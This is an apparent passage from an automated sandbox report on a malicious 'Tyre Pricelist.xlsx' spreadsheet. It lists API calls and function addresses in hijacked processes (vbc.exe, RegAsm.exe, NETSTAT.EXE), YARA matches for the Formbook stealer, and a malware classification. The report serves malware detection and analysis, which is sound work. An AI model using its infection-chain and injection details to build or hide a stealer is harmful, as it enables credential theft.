          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C50078 NtResumeThread,11_2_00C50078
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C501D4 NtSetValueKey,11_2_00C501D4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C51148 NtOpenThread,11_2_00C51148
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C5010C NtOpenDirectoryObject,11_2_00C5010C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4F8CC NtWaitForSingleObject,11_2_00C4F8CC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C51930 NtSetContextThread,11_2_00C51930
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4F938 NtWriteFile,11_2_00C4F938
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FA50 NtEnumerateValueKey,11_2_00C4FA50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FA20 NtQueryInformationFile,11_2_00C4FA20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FBE8 NtQueryVirtualMemory,11_2_00C4FBE8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FC90 NtUnmapViewOfSection,11_2_00C4FC90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C50C40 NtGetContextThread,11_2_00C50C40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FC48 NtSetInformationFile,11_2_00C4FC48
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FC30 NtOpenProcess,11_2_00C4FC30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C51D80 NtSuspendThread,11_2_00C51D80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FD5C NtEnumerateKey,11_2_00C4FD5C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FEA0 NtReadVirtualMemory,11_2_00C4FEA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FE24 NtWriteVirtualMemory,11_2_00C4FE24
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FFFC NtCreateProcessEx,11_2_00C4FFFC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FF34 NtQueueApcThread,11_2_00C4FF34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00099D50 NtCreateFile,11_2_00099D50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00099E00 NtReadFile,11_2_00099E00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00099E80 NtClose,11_2_00099E80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00099F30 NtAllocateVirtualMemory,11_2_00099F30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00099D4B NtCreateFile,11_2_00099D4B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00099DA4 NtCreateFile,11_2_00099DA4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00099DFE NtReadFile,11_2_00099DFE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00099E7A NtClose,11_2_00099E7A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00099F2B NtAllocateVirtualMemory,11_2_00099F2B
          Source: C:\Windows\SysWOW64\cmd.exeFile deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0106B70D4_2_0106B70D
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0106B6924_2_0106B692
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0106AAA24_2_0106AAA2
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0106B6E64_2_0106B6E6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004010306_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041D9066_2_0041D906
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041DB326_2_0041DB32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041DBA56_2_0041DBA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041E5ED6_2_0041E5ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00402D906_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041DE556_2_0041DE55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00409E2C6_2_00409E2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00409E306_2_00409E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041DF6E6_2_0041DF6E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041D7816_2_0041D781
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041CF936_2_0041CF93
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00402FB06_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025E12386_2_025E1238
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0253E2E96_2_0253E2E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025473536_2_02547353
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0258A37B6_2_0258A37B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025423056_2_02542305
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025663DB6_2_025663DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0253F3CF6_2_0253F3CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025E63BF6_2_025E63BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0255905A6_2_0255905A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025430406_2_02543040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0256D0056_2_0256D005
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0253E0C66_2_0253E0C6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0258A6346_2_0258A634
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025E26226_2_025E2622
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0254E6C16_2_0254E6C1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025446806_2_02544680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025757C36_2_025757C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025C579A6_2_025C579A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0254C7BC6_2_0254C7BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0257D47D6_2_0257D47D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025C443E6_2_025C443E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025754856_2_02575485
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025514896_2_02551489
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025865406_2_02586540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0254351F6_2_0254351F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0255C5F06_2_0255C5F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025F3A836_2_025F3A83
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02567B006_2_02567B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0253FBD76_2_0253FBD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025CDBDA6_2_025CDBDA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025ECBA46_2_025ECBA4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0254C85C6_2_0254C85C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0256286D6_2_0256286D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025DF8EE6_2_025DF8EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025C59556_2_025C5955
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025C394B6_2_025C394B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025569FE6_2_025569FE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025E098E6_2_025E098E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025429B26_2_025429B2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0255EE4C6_2_0255EE4C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02572E2F6_2_02572E2F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0256DF7C6_2_0256DF7C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02550F3F6_2_02550F3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025B2FDC6_2_025B2FDC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025DCFB16_2_025DCFB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0254CD5B6_2_0254CD5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02570D3B6_2_02570D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025DFDDD6_2_025DFDDD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008B98626_2_008B9862
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008B10696_2_008B1069
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008B10726_2_008B1072
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008B81326_2_008B8132
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008BAA326_2_008BAA32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008BDA6F6_2_008BDA6F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008BDB0E6_2_008BDB0E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008B5B1F6_2_008B5B1F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008B5B226_2_008B5B22
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008B2CEC6_2_008B2CEC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008B2CF26_2_008B2CF2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C5E0C611_2_00C5E0C6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C6304011_2_00C63040
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C7905A11_2_00C7905A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C8D00511_2_00C8D005
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C5E2E911_2_00C5E2E9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00D0123811_2_00D01238
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C5F3CF11_2_00C5F3CF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C863DB11_2_00C863DB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00D063BF11_2_00D063BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C6735311_2_00C67353
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00CAA37B11_2_00CAA37B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C6230511_2_00C62305
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C9548511_2_00C95485
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C7148911_2_00C71489
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C9D47D11_2_00C9D47D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C7C5F011_2_00C7C5F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00CA654011_2_00CA6540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C6351F11_2_00C6351F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C6E6C111_2_00C6E6C1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C6468011_2_00C64680
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00D0262211_2_00D02622
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00CAA63411_2_00CAA634
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C957C311_2_00C957C3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00CE579A11_2_00CE579A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C6C7BC11_2_00C6C7BC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00CFF8EE11_2_00CFF8EE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C6C85C11_2_00C6C85C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C8286D11_2_00C8286D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C769FE11_2_00C769FE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00D0098E11_2_00D0098E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C629B211_2_00C629B2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00CE595511_2_00CE5955
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00D13A8311_2_00D13A83
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C5FBD711_2_00C5FBD7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00CEDBDA11_2_00CEDBDA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00D0CBA411_2_00D0CBA4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C87B0011_2_00C87B00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00CFFDDD11_2_00CFFDDD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C6CD5B11_2_00C6CD5B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C90D3B11_2_00C90D3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C7EE4C11_2_00C7EE4C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C92E2F11_2_00C92E2F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C8DF7C11_2_00C8DF7C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C70F3F11_2_00C70F3F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0009E5ED11_2_0009E5ED
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0009D78111_2_0009D781
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00082D9011_2_00082D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00089E2C11_2_00089E2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00089E3011_2_00089E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0009DE5511_2_0009DE55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0009DF6E11_2_0009DF6E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0009CF9311_2_0009CF93
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00082FB011_2_00082FB0
          Source: Tyre Pricelist.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 00CA3F92 appears 108 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 00CA373B appears 238 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 00C5E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 00CCF970 appears 81 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 00C5DF5C appears 118 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0253E2A8 appears 38 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0253DF5C appears 119 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 025AF970 appears 84 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0258373B appears 244 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02583F92 appears 132 times
          Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: svchost[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@15/3@3/3
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Tyre Pricelist.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR167C.tmpJump to behavior
